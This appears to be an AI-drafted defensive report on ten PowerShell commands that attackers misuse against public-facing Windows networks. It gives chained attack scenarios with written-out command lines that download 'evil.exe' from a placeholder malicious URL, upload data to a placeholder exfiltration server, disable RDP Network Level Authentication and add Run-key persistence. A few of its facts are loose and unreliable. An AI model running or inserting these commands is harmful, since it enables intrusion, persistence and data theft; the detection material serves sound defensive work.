PowerShell Command Misuse in Attacks Targeting Public-Facing Networks

1. Introduction

PowerShell has become an indispensable scripting language and administrative tool within Windows environments, offering system administrators extensive control over local and remote systems. Its ubiquity across modern Windows operating systems and the deep level of access it provides to system functionalities make it a powerful asset for managing complex IT infrastructures. However, this very power and flexibility present a significant security challenge. The same capabilities that enable efficient administration can be exploited by malicious actors to conduct various stages of cyberattacks, particularly against public-facing networks, which serve as primary targets for external threats. The ability to leverage built-in tools like PowerShell lowers the barrier for attackers, allowing them to often operate without introducing external, potentially suspicious, executables onto compromised systems.

Understanding the dual-use nature of PowerShell is paramount for security professionals. Recognizing the legitimate applications of PowerShell commands is crucial for accurately differentiating between normal administrative activity and malicious exploitation. This context is essential for effective threat detection, incident response, and the overall security posture of an organization. This report aims to provide a detailed analysis of ten specific PowerShell commands that could be misused by attackers targeting public-facing networks. For each command, we will examine its intended legitimate uses and explore the potential for its misuse in compromising network security. Furthermore, this report will delve into how these commands can be combined as part of broader attack strategies, review documented real-world examples of their use in cyberattacks, outline best practices for detection and prevention, discuss relevant security monitoring tools and techniques, explore methods for hardening PowerShell environments, and analyze the potential impact of successful attacks leveraging these commands.

2. Individual Command Analysis

2.1. Get-WmiObject Win32_Process

●       Legitimate Uses: The Get-WmiObject cmdlet is a fundamental tool in PowerShell for retrieving information about Windows Management Instrumentation (WMI) classes and instances.¹ The Win32_Process WMI class specifically represents the processes currently running on the operating system.² System administrators commonly utilize this command to list all running processes to monitor system activity, identify processes consuming excessive resources like CPU or memory, and troubleshoot application issues.² For instance, an administrator might use this to verify if a critical application is running or to identify any runaway processes impacting system performance. The command also allows for filtering processes based on various properties such as name, Process ID (PID), or other attributes, enabling administrators to target specific applications for monitoring or management.³ For example, Get-WmiObject Win32_Process -Filter "Name = 'explorer.exe'" would retrieve information specifically about the Windows Explorer process. Furthermore, the CommandLine property provides valuable information about how a particular process was started, aiding in diagnostics and verifying the intended execution path of applications.² WMI, in general, is used legitimately to gather system statuses and to execute processes or scripts for automation and configuration purposes.⁴ Examples include querying for specific processes like Java for monitoring performance or integrating with Java-based applications.³ For brevity, administrators often use the alias gwmi for the Get-WmiObject cmdlet.⁷ While Get-CimInstance is a more modern and potentially faster alternative for interacting with WMI, Get-WmiObject remains widely used due to its shorter alias and established familiarity among administrators.⁸

●       Potential for Misuse: Attackers can leverage the Get-WmiObject Win32_Process command to enumerate all running processes on a compromised system to identify the presence of security software such as antivirus solutions or endpoint detection and response (EDR) agents.¹⁰ Understanding the security landscape of a target system is a crucial step for attackers as it allows them to tailor their subsequent actions to evade or disable these defenses. They might also look for processes associated with remote access tools or other software that could be potentially exploited for further access or control. While directly terminating security processes using the Terminate method (accessible via Invoke-WmiMethod or other means) is possible ², this action is often highly suspicious and likely to generate security alerts. By examining process names and command-line arguments, attackers can gather detailed information about the system's activity and the installed software ², which aids in their reconnaissance efforts and helps them plan further stages of the attack. Although the command-line tool wmic.exe is being deprecated, Get-WmiObject provides similar functionalities and remains a viable tool for attackers seeking to gather process information.¹³ Adversaries frequently use WMI for discovery purposes, and listing active processes is a fundamental aspect of this.¹¹ It is important to note that while the Get-WmiObject cmdlet itself might not directly spawn processes like wmic.exe or wmiprvse.exe, its use interacts with the WMI service, and malicious WMI activity often manifests through these related processes.¹⁴ The ability to retrieve the command line used to start a process is particularly valuable for attackers. This information can reveal if security software is running with specific arguments that might indicate weaknesses or if other applications are susceptible to command-line injection vulnerabilities [Insight 3]. Furthermore, the capability of Get-WmiObject to query remote computers ¹ transforms it into a potent reconnaissance tool for attackers who have already established a foothold on one machine within the network and are seeking to understand the broader environment by examining processes running on adjacent systems [Insight 4].

2.2. Get-Service

●       Legitimate Uses: The Get-Service cmdlet is a core PowerShell tool designed to retrieve the status of services running on a local or remote computer.¹⁵ System administrators rely on this command to monitor the health of critical services, checking whether they are in a 'Running', 'Stopped', or 'Paused' state.¹⁵ It enables administrators to quickly identify services that may have unexpectedly stopped or are not functioning correctly. The command offers filtering capabilities based on service name, display name, or current status, allowing administrators to focus on specific services of interest.¹⁵ For example, Get-Service -Name "Spooler" retrieves information about the Print Spooler service, while Get-Service -DisplayName "*network*" lists all services with "network" in their display name, and Get-Service | Where-Object {$_.Status -eq "Running"} displays only the services that are currently running. The -RequiredServices and -DependentServices parameters are invaluable for understanding the relationships between services, helping administrators troubleshoot startup issues or plan maintenance that might affect service dependencies.¹⁵ PowerShell's remote management capabilities extend to services, allowing administrators to use Get-Service with the -ComputerName parameter (or via Invoke-Command in newer PowerShell versions) to manage services on multiple remote machines from a central console.¹⁵ The cmdlet also provides detailed service information, including the path to the service executable and its Process ID (PID) ¹⁵, which can be crucial for diagnosing performance problems or identifying the underlying process of a specific service. Get-Service is often used in conjunction with other service management cmdlets like Start-Service, Stop-Service, and Restart-Service to provide a comprehensive suite of tools for managing Windows services.¹⁵

●       Potential for Misuse: Attackers can exploit the Get-Service command to enumerate all services installed on a system to identify potential vulnerabilities or misconfigurations that could be leveraged for further exploitation.¹¹ By examining the list of running services, attackers can specifically look for and identify security-related services such as the Windows Firewall (MpsSvc) or Windows Defender Antivirus (WinDefend).¹¹ Once these services are identified, attackers can then use the Stop-Service cmdlet (analyzed in detail later) to disable them, significantly weakening the system's defenses.¹¹ Disabling security services allows attackers to more easily deploy malware, move laterally across the network, or exfiltrate sensitive data without being blocked or detected by these security measures. Furthermore, by stopping critical system services, attackers can potentially cause a denial of service, disrupting normal operations of the targeted system or network.²³ Like processes, adversaries also use WMI for discovery, and this includes listing the active services running on a system.¹¹ The -Exclude parameter of Get-Service could be used by attackers to specifically focus their enumeration on services other than well-known security products. This allows them to potentially identify less common or third-party services that might have known vulnerabilities or be less rigorously monitored by security teams [Insight 5]. Additionally, the ability to check the startup type of a service can provide valuable information to an attacker. If a security service is configured to start manually or is disabled, it might indicate a previous compromise or a misconfiguration that the attacker can exploit to maintain their access or further their objectives [Insight 6].

2.3. Test-NetConnection -ComputerName <target> -Port <port>

●       Legitimate Uses: The Test-NetConnection cmdlet is a versatile tool used to test network connectivity to a specified computer and port [User Query]. It serves as a fundamental command for network troubleshooting, allowing administrators to verify firewall rules and ensure that services are actively listening on their expected network ports. For example, an administrator might use this command to check if a web server is reachable on port 80 or 443, or to confirm that a database server is accepting connections on its designated port. Beyond basic port connectivity, Test-NetConnection also provides the capability to perform basic DNS resolution to a given computer name and to send ICMP echo requests (pings), which can help in diagnosing whether a connectivity issue stems from name resolution problems or a lack of basic network reachability.

●       Potential for Misuse: Attackers frequently utilize the Test-NetConnection command for reconnaissance purposes to identify open ports on target machines within a network [User Query]. Open ports are indicative of services that are actively listening for network connections, and these services can represent potential entry points or vulnerabilities that attackers might attempt to exploit. By systematically scanning for common service ports such as 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 443 (HTTPS), and 3389 (RDP), attackers can discover what services are exposed on a target system and prioritize those that are known to have security weaknesses. This command is also invaluable for attackers who have already gained a foothold on one system within a network, as it allows them to map the internal network and identify other accessible systems and the services they are running, facilitating lateral movement to other potentially valuable targets.²⁵ The speed and ease of use of Test-NetConnection, being a built-in PowerShell cmdlet, make it a convenient tool for attackers to quickly assess the network landscape from a compromised machine without needing to introduce external port scanning tools that might be more easily detected by network security appliances [Insight 8]. Furthermore, attackers often use the information gathered from Test-NetConnection in conjunction with other commands. For instance, upon identifying an open RDP port (3389), they might then attempt to use other PowerShell commands, such as those related to RDP configuration (like Set-ItemProperty to disable Network Level Authentication), to further their attack [Insight 7].

2.4. Invoke-WebRequest -Uri "<URL>"

●       Legitimate Uses: The Invoke-WebRequest cmdlet is a powerful tool in PowerShell that allows users to send web requests to specified Uniform Resource Identifiers (URIs) [User Query]. Its legitimate uses are diverse, including downloading files from the internet for purposes such as software installation or obtaining scripts for automation. Administrators might use this to retrieve installation packages for new software, download updated scripts for system management, or access other necessary resources hosted on web servers. Additionally, Invoke-WebRequest can interact with web-based Application Programming Interfaces (APIs) and retrieve the content of web pages, which is useful for automation tasks, data processing, or monitoring website status. For example, a script could be written to periodically check the status code of a website using Invoke-WebRequest and trigger an alert if the site becomes unavailable.

●       Potential for Misuse: Malicious actors frequently misuse the Invoke-WebRequest command to download files from remote servers, including various forms of malware, malicious scripts, or other tools necessary for conducting further exploitation of a compromised system.¹¹ This is a common initial step in many attack scenarios, allowing attackers to introduce their malicious payloads onto the target machine. Furthermore, attackers can use Invoke-WebRequest to interact with their command and control (C2) infrastructure. This interaction might involve sending requests to the C2 server to receive further instructions on what actions to take on the compromised system, or it could involve exfiltrating sensitive data harvested from the system back to the attacker's server. The command can also be used to probe web applications for existing vulnerabilities by sending specially crafted web requests, or to automate malicious interactions with web-based services for nefarious purposes. The -OutFile parameter, while not explicitly mentioned in the user query, is a standard feature of Invoke-WebRequest that allows attackers to save downloaded files directly to the disk [Insight 9]. This capability can potentially help bypass some security monitoring mechanisms that might primarily focus on analyzing network traffic without performing deep inspection of the downloaded file content or monitoring file system activity. Attackers might also employ Invoke-WebRequest to download seemingly harmless files, such as documents or images, that actually contain embedded malicious scripts or macros. These embedded payloads can then be executed using other PowerShell commands or through native Windows features once the user interacts with the downloaded file [Insight 10]. This technique often relies on social engineering to trick users into opening the file and enabling the malicious content.

2.5. Invoke-Command -ComputerName <target> -ScriptBlock {... }

●       Legitimate Uses: The Invoke-Command cmdlet is a powerful feature in PowerShell that enables administrators to execute code remotely on one or more target computers.¹⁷ This capability is extensively used for various legitimate administrative tasks, including remote management of servers and workstations, deploying software across multiple systems simultaneously, and running scripts for automation or maintenance on remote machines. For instance, an administrator could use Invoke-Command to restart a service on a remote server, apply a configuration change to multiple workstations, or collect log files from several systems at once. For this command to function, proper permissions and configuration are required, most notably the enabling of PowerShell Remoting on the target computers and the possession of appropriate administrative credentials by the user executing the command.

●       Potential for Misuse: Attackers can significantly leverage the Invoke-Command cmdlet for lateral movement within a network if they have managed to compromise credentials or exploit a vulnerability that grants them the necessary permissions on a target system.¹¹ Once an attacker has gained access to one machine, they can use Invoke-Command to reach out to other systems within the network and execute malicious payloads or scripts remotely, effectively expanding their control and access to potentially more sensitive data or critical infrastructure. It's worth noting that WMI also provides capabilities for remote execution, particularly through the Create method of the Win32_Process class ¹¹, offering an alternative avenue for attackers if PowerShell Remoting is not enabled or is restricted. A particularly potent aspect of Invoke-Command for attackers is the ScriptBlock parameter. This allows them to execute complex sequences of commands directly in memory on a remote system without the need to first transfer any files to the target [Insight 11]. This "fileless" execution method can be more stealthy as it reduces the attacker's footprint on the file system, making detection more challenging for traditional security software that relies on scanning files. Even in scenarios where PowerShell Remoting is not explicitly enabled across the network, attackers with sufficient privileges might still be able to leverage Invoke-Command through other underlying mechanisms [Insight 12], underscoring the importance of robust access control and network segmentation as security measures.

2.6. Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"

●       Legitimate Uses: This specific Get-ItemProperty command is used to retrieve the values of the properties located under the registry key HKLM:\Software\Microsoft\Windows\CurrentVersion\Run [User Query]. This registry key contains a list of programs that are configured to run automatically every time the system starts up. System administrators legitimately use this command for various purposes, including auditing the applications and services that are launched at startup, troubleshooting slow system boot times by identifying resource-intensive startup programs, and managing the automatically launched applications on a system. By reviewing the entries in this key, administrators can ensure that only authorized and necessary programs are starting with the operating system.

●       Potential for Misuse: Attackers frequently target the system startup mechanisms to achieve persistence on a compromised system, ensuring that their malicious code is executed automatically even after a system reboot. The Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" command is invaluable to attackers in this context. They can use it to identify existing persistent mechanisms that might already be in place on the system or, more importantly, to verify if their own malicious scripts or executables have been successfully added to the list of startup programs.²⁶ Once an attacker has confirmed their entry exists in the Run key, their malicious code will be executed each time the system starts. Furthermore, attackers can use the Set-ItemProperty cmdlet (analyzed later) to add their own malicious entries to this registry key, effectively establishing persistence.²⁶ It's important to note that attackers might not limit their focus to just this one Run key. They might also target other similar registry keys, such as those located under the HKCU (HKEY_CURRENT_USER) hive for per-user persistence, or other auto-start locations within the registry and file system [Insight 13]. The Get-ItemProperty command can be easily adapted to query these alternative locations by simply modifying the -Path parameter. By examining the values associated with the startup entries, which typically contain the full path to the executable or script being launched, attackers can also gain further insights into other software installed on the system [Insight 14]. This information can be valuable for identifying potential targets for further exploitation or privilege escalation.

2.7. Get-NetIPConfiguration

●       Legitimate Uses: The Get-NetIPConfiguration cmdlet is used to display comprehensive network configuration details for a system, including vital information such as IP addresses, DNS server addresses, and the default gateway [User Query]. System administrators routinely use this command for a variety of legitimate purposes, primarily related to network troubleshooting and verifying IP settings. When diagnosing network connectivity issues, administrators will often use this command to confirm that a system has obtained the correct IP address, subnet mask, default gateway, and DNS server settings. It is also used for general system information gathering, providing a quick overview of the system's network configuration.

●       Potential for Misuse: Attackers find the information provided by Get-NetIPConfiguration extremely valuable for conducting network reconnaissance on a compromised system [User Query]. Understanding the IP address range of the network, the addresses of the DNS servers being used, and the system's default gateway helps attackers to orient themselves within the network environment after they have successfully compromised a host. This information allows them to map the network topology, identify the network segment the compromised machine belongs to, and potentially locate other target systems or critical infrastructure [Insight 16]. Knowing the default gateway, for instance, can help attackers identify the router or firewall, which might be a target for further attacks or a point they need to bypass to reach external networks or other internal segments. The DNS server information obtained can also be beneficial to attackers. By knowing the DNS servers in use, they can potentially determine if the network employs any content filtering or security measures that rely on DNS resolution [Insight 15]. They might also attempt to poison the local DNS cache to redirect traffic to malicious sites or configure the compromised system to use attacker-controlled DNS servers for more reliable communication with their command and control infrastructure. Ultimately, the network configuration details gathered by Get-NetIPConfiguration are crucial for attackers in planning their lateral movement strategy within the network and for establishing reliable communication with their external command and control servers.

2.8. Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 0

●       Legitimate Uses: The Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 0 command is used to modify a specific registry value that controls whether Network Level Authentication (NLA) is required for Remote Desktop Protocol (RDP) connections [User Query]. Setting the "UserAuthentication" value to 0 disables NLA for RDP on the target system. While disabling NLA generally weakens the security of RDP, administrators might have specific, albeit rare, legitimate reasons to do so temporarily. These scenarios could include very specific troubleshooting situations in isolated test environments where NLA might interfere with certain tests, or in highly controlled internal networks where the risks associated with disabling NLA are deemed minimal and outweighed by a specific administrative need. However, it is generally considered a security best practice to keep NLA enabled.

●       Potential for Misuse: Attackers frequently target the Remote Desktop Protocol (RDP) as a means of gaining unauthorized access to systems, especially those exposed to the internet. The Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 0 command is highly valuable to attackers in this context because disabling Network Level Authentication (NLA) significantly reduces the security of the RDP service [User Query]. NLA provides an important pre-authentication layer, requiring the connecting user to authenticate before a full RDP session is established. By disabling NLA, attackers can potentially make it much easier to brute-force the credentials for the RDP service if it is exposed to the public internet. An attacker who has used Test-NetConnection to identify an open RDP port (typically 3389) on a target system might then attempt to use this Set-ItemProperty command (if they have already gained sufficient privileges on the system, perhaps through another vulnerability) to lower the security of the RDP service, making it more susceptible to password guessing attacks.²⁷ Attackers might combine this sequence with other commands in their attack strategy. For instance, they could first scan for publicly accessible RDP services using Test-NetConnection, then attempt to disable NLA using Set-ItemProperty, and subsequently launch a dedicated RDP brute-force attack using specialized tools designed for this purpose [Insight 17]. It is important to note that modifying this particular registry key requires elevated administrative privileges [Insight 18], meaning an attacker would likely need to have already compromised the system or obtained administrative credentials through other means before they could successfully execute this command.

2.9. Stop-Service <ServiceName>

●       Legitimate Uses: The Stop-Service <ServiceName> command in PowerShell is used to stop a currently running Windows service.¹⁵ System administrators routinely use this command for various legitimate purposes, including performing system maintenance that requires stopping certain services, troubleshooting issues by temporarily disabling services to isolate problems, or disabling non-essential services to free up system resources or reduce the attack surface in specific controlled environments. For example, during software installation or updates, it might be necessary to stop services that could interfere with the process. Similarly, to diagnose why a particular application is not working correctly, an administrator might stop related services one by one to see if it resolves the issue.

●       Potential for Misuse: Attackers frequently employ the Stop-Service command to disable security software installed on a compromised system, such as the Windows Firewall (using the service name MpsSvc) or antivirus solutions like Windows Defender Antivirus (using the service name WinDefend).¹¹ By successfully stopping these critical security components, attackers can significantly lower the defenses of the targeted system, making it much easier to carry out further malicious activities, such as downloading and executing malware, establishing command and control channels, or moving laterally to other systems within the network, without being detected or blocked. Furthermore, attackers might also use Stop-Service to halt critical system services that are essential for network connectivity, application functionality, or even the stability of the operating system itself. This can lead to a denial of service condition, disrupting normal operations of the targeted public-facing network and potentially causing significant business impact.²³ It is a common tactic for adversaries to use WMI for defense evasion, and this includes stopping critical Windows services to weaken the system's security posture.¹¹ Additionally, attackers might stop logging or auditing services to cover their tracks and make it more difficult for forensic investigators to analyze the attack and understand the extent of the compromise after the fact [Insight 19]. It is important to note that the ability to successfully stop most core security services typically requires elevated administrative privileges on the targeted system [Insight 20], indicating that this command is often used in the post-exploitation phase of an attack after the attacker has already gained a certain level of access.

2.10. New-Object System.Net.WebClient; $client.DownloadFile("<MaliciousURL>", "C:\temp\evil.exe")

●       Legitimate Uses: This sequence of PowerShell commands is a programmatic way to download a file from a specified URL and save it to a local path on the system [User Query]. The New-Object System.Net.WebClient part of the command creates a new object of the .NET class System.Net.WebClient, which provides methods for interacting with web servers. The subsequent $client.DownloadFile("<URL>", "C:\temp\evil.exe") line then uses the DownloadFile method of this object to download the file located at the specified URL and save it to the path C:\temp\evil.exe on the local file system. This method is often used in PowerShell scripts for automating the download of resources, updates, or other files from the internet as part of various administrative or deployment tasks. For instance, a script might use this to download the latest version of a configuration file or a software package from a designated web server.

●       Potential for Misuse: Attackers frequently employ this specific sequence of PowerShell commands as a common method to download and save malware from the internet onto a compromised system without directly utilizing the Invoke-WebRequest cmdlet [User Query]. They might choose this approach as an alternative to Invoke-WebRequest if they suspect that the latter might be more closely monitored by security solutions, or if they require more granular control over the file download process. This technique can be used to fetch a wide variety of malicious payloads, including executable files, scripts written in various languages, or other tools that the attacker needs for further exploitation of the system or the network. Once the malicious file is downloaded and saved to the local file system, the attacker can then execute it using other PowerShell commands, such as Start-Process or Invoke-Expression, or through other native Windows features. Attackers might strategically choose to download these files to temporary locations like C:\temp [Insight 21] in an attempt to avoid detection by security software or administrators who might be more closely monitoring other directories. Additionally, some attackers might prefer this method over Invoke-WebRequest as they believe it might bypass certain network monitoring rules or endpoint security configurations that are specifically designed to look for the use of the Invoke-WebRequest cmdlet [Insight 22]. This highlights the importance of monitoring not just specific PowerShell cmdlets but also the underlying .NET framework calls that can be leveraged for malicious purposes.

3. Attack Strategies and Command Combinations

Attackers often combine the aforementioned PowerShell commands in strategic sequences to achieve their objectives across different phases of an attack on a public-facing network. By chaining these commands together, they can conduct reconnaissance, gain initial access, execute malicious code, establish persistence, move laterally within the network, and ultimately achieve their desired impact. The following table summarizes potential command combinations for various attack phases:

Attack Phase	PowerShell Commands Used	Purpose
Reconnaissance	Get-WmiObject Win32_Process, Get-Service, Test-NetConnection, Get-NetIPConfiguration	Attackers initiate their campaign by gathering intelligence about the target environment. Get-WmiObject Win32_Process helps identify running security software and potential targets. Get-Service enumerates installed services to find vulnerable or interesting ones. Test-NetConnection scans for open ports to discover potential entry points. Get-NetIPConfiguration provides network layout details.
Initial Access	Test-NetConnection (to identify open RDP on port 3389), Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 0 (if attacker has sufficient privileges), followed by brute-force attempts against RDP. Invoke-WebRequest or New-Object System.Net.WebClient to download initial payloads if another vulnerability is exploited.	Once reconnaissance is complete, attackers attempt to gain an initial foothold. This might involve exploiting weaknesses in exposed services like RDP, potentially weakening their security using PowerShell before a brute-force attempt. Alternatively, they might leverage vulnerabilities in web applications or other services to download and execute an initial stager or exploit.
Execution	Invoke-Command -ComputerName <target> -ScriptBlock {... } to execute commands remotely. Get-WmiObject Win32_Process to identify and potentially terminate security software. Stop-Service <ServiceName> to disable security services. New-Object System.Net.WebClient; $client.DownloadFile("<MaliciousURL>", "C:\temp\evil.exe") to download additional tools.	After gaining initial access, attackers execute malicious code to further their objectives. This could involve running commands remotely on other systems, disabling security measures to facilitate their activities, or downloading additional tools needed for subsequent stages of the attack.
Persistence	Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" to check for existing startup programs. Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" to add malicious scripts to the startup registry key.	To ensure continued access to the compromised system, attackers often establish persistence mechanisms. This typically involves configuring malicious code to run automatically whenever the system starts, allowing them to regain control even after a reboot.
Lateral Movement	Get-NetIPConfiguration to identify the network range. Test-NetConnection -ComputerName <target> -Port <port> to check connectivity to other systems. Invoke-Command -ComputerName <target> -ScriptBlock {... } to execute reconnaissance commands on remote systems. New-Object System.Net.WebClient; $client.DownloadFile("<MaliciousURL>", "\\<target>\C$\temp\evil.exe") to copy tools to remote systems.	Once a foothold is established, attackers typically try to expand their reach within the network. This involves discovering other reachable systems, gathering information about them, and then using compromised credentials or exploiting vulnerabilities to execute commands or deploy tools on those systems.
Impact	Stop-Service <ServiceName> to disrupt critical services. Get-WmiObject (potentially with Invoke-WmiMethod -Name Terminate) to stop key business applications. Invoke-WebRequest -Uri "<ExternalDataExfiltrationServer>" or New-Object System.Net.WebClient; $client.UploadFile("<ExternalDataExfiltrationServer>", "C:\sensitive_data.zip") (for data exfiltration).	The final phase of an attack focuses on achieving the attacker's objectives, which could include disrupting services to cause operational chaos, stopping critical business applications, or exfiltrating sensitive data from the compromised network to an external server.

Consider the following illustrative scenarios:

●       Scenario 1 (RDP Brute-Force): An attacker might begin by using Test-NetConnection -ComputerName <target_ip_range> -Port 3389 to identify public-facing systems with open RDP ports. Upon finding a target, if they have gained some initial access (e.g., through a web application vulnerability), they might attempt to execute Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 0 to disable NLA, making the RDP service more vulnerable to brute-force attacks. They would then employ a dedicated RDP brute-force tool to try and obtain valid login credentials. Once successful, they could use Invoke-Command to execute further malicious actions on the compromised system.

●       Scenario 2 (Malware Download and Execution): An attacker who has gained initial access to a web server might use Invoke-WebRequest -Uri "<malicious_url>/payload.exe" -OutFile "C:\inetpub\wwwroot\payload.exe" to download a malicious executable to the web server's file system. Subsequently, they might use Get-WmiObject Win32_Process -Filter "Name = 'antivirus.exe'" to identify the antivirus process and then attempt to stop it using Stop-Service antivirus (if they have sufficient privileges) before executing the downloaded payload.

●       Scenario 3 (Lateral Movement and Persistence): After compromising an initial host, an attacker could use Get-NetIPConfiguration to understand the internal network layout. They might then use Test-NetConnection -ComputerName <internal_ip_range> -Port 445 to identify other systems with open SMB ports, indicating potential for lateral movement. Using compromised credentials obtained from the first host, they could use Invoke-Command -ComputerName <internal_ip> -ScriptBlock { Get-Service } to gather information about services running on internal systems. If they identify a valuable target, they might use Invoke-Command -ComputerName <internal_ip> -ScriptBlock { Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" } to check the startup programs and then use Invoke-Command -ComputerName <internal_ip> -ScriptBlock { Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousApp" -Value "C:\temp\malware.exe" } to establish persistence. They might have previously used New-Object System.Net.WebClient; $client.DownloadFile("<MaliciousURL>", "\\<internal_ip>\C$\temp\malware.exe") to copy the malware to the target system.

The success of these combined attacks often hinges on the attacker's ability to escalate privileges or exploit existing vulnerabilities within the target environment [Insight 23]. While the PowerShell commands themselves are powerful tools for post-exploitation activities, initial access and privilege escalation are frequently achieved through other methods.

4. Real-World Examples and Case Studies

While the provided research snippets do not offer explicit case studies detailing the misuse of all ten specific commands in a single attack on a public-facing network, they do highlight the real-world use of similar techniques and commands in various cyberattacks. For instance, snippet ²⁸ mentions the Petya ransomware using WvUtil.exe to clear Windows event logs, demonstrating the attacker objective of disabling or removing logs, which could also be achieved by stopping the Event Log service using Stop-Service. Snippet ²⁴ describes a large-scale DDoS attack targeting Dyn, illustrating the potential impact of service disruption, which attackers might attempt to facilitate on compromised hosts by using Stop-Service against critical services. Snippet ¹¹ broadly discusses the abuse of Windows Management Instrumentation (WMI) by threat actors for activities such as creating processes (similar to what Invoke-Command can achieve remotely) and tampering with system settings (which can involve registry modifications using Set-ItemProperty), as well as reconnaissance using commands like Get-WmiObject. This indicates that the underlying technologies PowerShell interacts with are indeed leveraged in real-world attacks. Furthermore, the association of WMI and PowerShell with fileless malware ²⁹ suggests that commands like New-Object System.Net.WebClient could be used to download and execute malicious code directly in memory, leaving minimal traces. Snippet ²⁶ mentions the use of PowerShell for profile injection to achieve persistence, a technique that could involve using Get-ItemProperty to locate PowerShell profile files and then modifying them to execute malicious code. Although a specific incident detailing the combined use of all ten commands against a public-facing network is not explicitly provided, the prevalence of these individual techniques and the broader pattern of PowerShell and WMI abuse in documented attacks strongly suggest that these commands, and combinations thereof, are indeed utilized by malicious actors in real-world scenarios [Insight 24].

5. Detection and Prevention Best Practices

To effectively detect and prevent the malicious use of the analyzed PowerShell commands on a public-facing network, organizations should implement a multi-layered security approach incorporating the following best practices:

●       Enable Comprehensive Logging and Auditing: Command-line auditing and logging, especially for PowerShell activity, are crucial.¹⁴ Enable PowerShell script block logging to record the full content of executed scripts and commands. Consider using Sysmon, a tool from Microsoft Sysinternals, which provides even more detailed monitoring of various system activities, including PowerShell execution, process creation, network connections, and registry modifications.

●       Monitor Process Lineage: Continuously monitor for suspicious parent-child process relationships involving powershell.exe and WMI-related processes like wmic.exe and wmiprvse.exe.¹⁴ Investigate any unexpected or unauthorized processes spawning PowerShell or WMI activities.

●       Leverage Antimalware Scan Interface (AMSI): Ensure that endpoint security solutions leverage the Antimalware Scan Interface (AMSI) to gain deep visibility into the behavior of PowerShell scripts and commands before execution.¹⁴ AMSI can help detect and block malicious PowerShell-based attacks at an early stage.

●       Monitor WMI Activity: Implement robust monitoring for the creation and modification of WMI event subscriptions, filters, and consumers, as these are often used for establishing persistent backdoors.¹⁴ Set up alerts for any unusual changes to the WMI repository.

●       Restrict PowerShell Usage: Disable or strictly limit the use of PowerShell on systems where it is not essential for legitimate administrative tasks. Consider implementing application whitelisting to control which applications and scripts are allowed to execute.

●       Implement Least Privilege: Enforce the principle of least privilege by ensuring that user accounts and service accounts only have the necessary permissions to perform their assigned duties. This limits the potential impact if an account is compromised and prevents attackers from easily executing commands requiring elevated privileges.

●       User Security Awareness Training: Conduct regular security awareness training for users, educating them about the risks associated with social engineering and phishing attacks that might lead to the execution of malicious PowerShell scripts or the downloading of infected files.

●       Maintain Up-to-Date Systems and Software: Ensure that all systems, including the operating system and all installed software, are kept up to date with the latest security patches and updates to address known vulnerabilities that attackers could exploit.

●       Network Segmentation: Implement network segmentation to isolate critical parts of the public-facing network from less trusted segments. This can help contain a potential breach and limit the attacker's ability to move laterally using commands like Invoke-Command.

●       Strong Authentication and Multi-Factor Authentication (MFA): Enforce strong password policies and implement multi-factor authentication for all accounts, especially those with administrative privileges. This significantly reduces the risk of credential theft, which is often a prerequisite for many PowerShell-based attacks.³¹

●       Monitor Network Traffic: Continuously monitor network traffic for suspicious patterns, such as unusual outbound connections to unexpected destinations or known malicious IP addresses, and excessive port scanning activity originating from within the network.

A layered security approach that combines these preventative and detective measures is essential for effectively mitigating the risks posed by the malicious use of PowerShell commands [Insight 25].

6. Security Monitoring Tools and Techniques

Several security monitoring tools and techniques can be employed to identify suspicious activity related to the ten PowerShell commands:

●       Security Information and Event Management (SIEM) Systems: SIEM solutions can aggregate and correlate logs from various sources, including Windows event logs (with PowerShell logging enabled), Sysmon logs, network devices, and security appliances. Security teams can create specific correlation rules and alerts within the SIEM to detect patterns indicative of malicious PowerShell usage. For example, an alert could be triggered if a user on a public-facing web server executes Stop-Service against a known security service, or if there are numerous failed Invoke-Command attempts from a single host.

●       Endpoint Detection and Response (EDR) Solutions: EDR tools provide deep visibility into endpoint activity, including detailed tracking of PowerShell command execution, process relationships, file modifications, and network connections. They can detect and respond to malicious behavior in real-time by analyzing patterns of activity and identifying deviations from established baselines. EDR solutions often leverage the Antimalware Scan Interface (AMSI) to inspect PowerShell scripts and commands for malicious content.

●       Antimalware Scan Interface (AMSI): As mentioned previously, AMSI provides a crucial layer of defense by allowing security solutions to inspect PowerShell code before it is executed.¹⁴ Ensure that the organization's endpoint security solution utilizes AMSI and is configured to generate alerts for potentially malicious PowerShell activity.

●       Network Intrusion Detection/Prevention Systems (NIDS/NIPS): NIDS/NIPS can monitor network traffic for patterns associated with the misuse of commands like Invoke-WebRequest (e.g., detecting connections to known malicious URLs or command and control servers) and Test-NetConnection (e.g., identifying excessive port scanning activity).

●       Behavioral Analytics: Behavioral analytics tools can establish a baseline of normal PowerShell usage within the environment and flag anomalous activity that might indicate malicious behavior. For instance, if a user who typically does not use PowerShell suddenly executes a series of commands like Get-WmiObject followed by Stop-Service against security software, this could be flagged as suspicious.

Effective security monitoring requires not only the deployment of these tools but also the expertise to configure them properly and to analyze the alerts they generate. Security teams need to develop specific use cases and correlation rules tailored to detect the potential misuse of these PowerShell commands [Insight 26].

7. Hardening PowerShell Environments

Hardening PowerShell environments can significantly limit the potential for misuse by attackers:

●       Constrained Language Mode: Enabling Constrained Language Mode restricts the PowerShell language features available, limiting the ability of attackers to execute sophisticated malicious scripts.¹⁴ This mode restricts access to sensitive .NET functionalities and COM objects.

